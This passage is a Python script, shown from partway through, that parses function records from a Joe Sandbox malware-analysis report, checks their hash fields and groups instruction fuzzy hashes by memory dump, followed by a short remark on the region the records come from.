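    ('Joe Sandbox IDA Plugin', 'Similarity') are skipped. Empty values such as
    'API ID:' are kept as ''. Bullets seen before the first start line (a record
    cut off at a page boundary, like the first one in this section) are kept too.
    """
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == RECORD_START:
            if current:
                records.append(current)
            current = {}
            continue
        if not line.startswith("•"):
            continue
        if current is None:
            current = {}
        key, _, value = line[1:].partition(":")
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def parse_source(field):
    """Split a 'Source File' value into (dump file name, offset as int, based_on_pe)."""
    m = SOURCE_RE.match(field)
    if not m:
        raise ValueError(f"unexpected Source File format: {field!r}")
    return m["file"], int(m["offset"], 16), m["pe"] == "true"


def check_record(rec):
    """Sanity checks before pivoting on a record; returns a list of problems."""
    problems = []
    for key in ("Opcode ID", "Instruction ID"):
        v = rec.get(key, "")
        if len(v) != 64 or any(c not in "0123456789abcdef" for c in v):
            problems.append(f"{key} is not a 64-hex-digit value")
    if rec.get("Opcode ID") != rec.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID and Opcode Fuzzy Hash differ")
    return problems


def instruction_hashes_by_dump(records):
    """Map each memory dump file to the Instruction Fuzzy Hashes lifted from it."""
    grouped = defaultdict(list)
    for rec in records:
        dump, _, _ = parse_source(rec["Source File"])
        grouped[dump].append(rec["Instruction Fuzzy Hash"])
    return dict(grouped)


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        dump, offset, pe = parse_source(rec["Source File"])
        status = check_record(rec) or "ok"
        print(f"{dump} @ {offset:#x} (PE image: {pe}) -> {rec['Instruction Fuzzy Hash']} {status}")
```

Feeding the whole report text (not just this section) to `parse_records` yields one dict per function, which can then be grouped per dump with `instruction_hashes_by_dump` to see which in-memory regions the analysis lifted code from; all records on this page come from the same region based at 0x7FFD34690000 in process 24.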